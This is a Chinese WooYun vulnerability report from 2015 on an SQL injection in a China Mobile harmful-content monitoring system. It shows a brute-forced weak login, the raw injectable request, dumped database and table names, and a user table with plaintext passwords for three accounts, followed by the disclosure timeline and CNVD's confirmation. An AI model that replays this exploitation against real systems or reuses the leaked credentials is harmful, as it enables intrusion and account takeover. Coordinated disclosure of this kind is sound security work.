乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-06: 细节已通知厂商并且等待厂商处理中 2015-11-10: 厂商已经确认,细节仅向厂商公开 2015-11-20: 细节向核心白帽子及相关领域专家公开 2015-11-30: 细节向普通白帽子公开 2015-12-10: 细节向实习白帽子公开 2015-12-25: 细节向公众公开
中国移动不良信息拨测系统sql注入漏洞
**.**.**.**:11222/ncss/爆破之wanghua 123456
GET /ncss/auditmana/webTree.do?tr=listWebSites&treeId=**.**.**.*** HTTP/1.1Host: **.**.**.**:11222Proxy-Connection: keep-aliveCache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36DNT: 1Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: JSESSIONID=8D4D5550134B823EFFF04AEF85533DCEAlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
available databases [3]: [*] information_schema[*] ncss[*] test
Database: ncss [1020 tables]+---------------------------------+| acquisition_conf_policy || alarm_forward_info || alarm_info || alarm_msg_his || alarm_msg_info || alarm_msg_per || alarm_policy || alarm_report_datas || alarm_report_his || alarm_report_info || alarm_rule || area_info || audit_statinfo || audit_user_count || con_test || daily_audit_time_report || data_storage_sheet || day_audit_time_report || day_bidwinning_amount || day_hostname_stat || day_hostname_stat_0111 || day_report_audit_area_monitor || day_report_audit_info || day_report_audit_visitsrank || day_server_stat || day_work_load_report || department || domain_tree || downloadblack || equip_conf_send_status || evidence || evidence_video || front_acquisition_policy || front_image_policy || front_info || front_keyword_policy || front_text_policy || host_display || host_reason || host_time_baseinfo || hostname_test || hour_hostname_0105rd || hour_hostname_stat || hour_server_stat || idc_room || image_conf_policy || image_conf_send_status || ip_area || keyword || keyword_conf_policy || keyword_conf_send_status || keyword_copy || keyword_policy_type || keyword_type || log_black_list_submit || log_black_list_submit_item || log_record || log_sys_record || mobile_area || month_bidwinning_amount || month_hostname_stat || month_server_stat || ncss_user |省略...
Table: ncss_user[3 entries]admin jhkj9527wanghua 123456yaotingting 123
危害等级:高
漏洞Rank:10
确认时间:2015-11-10 10:30
CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.
暂无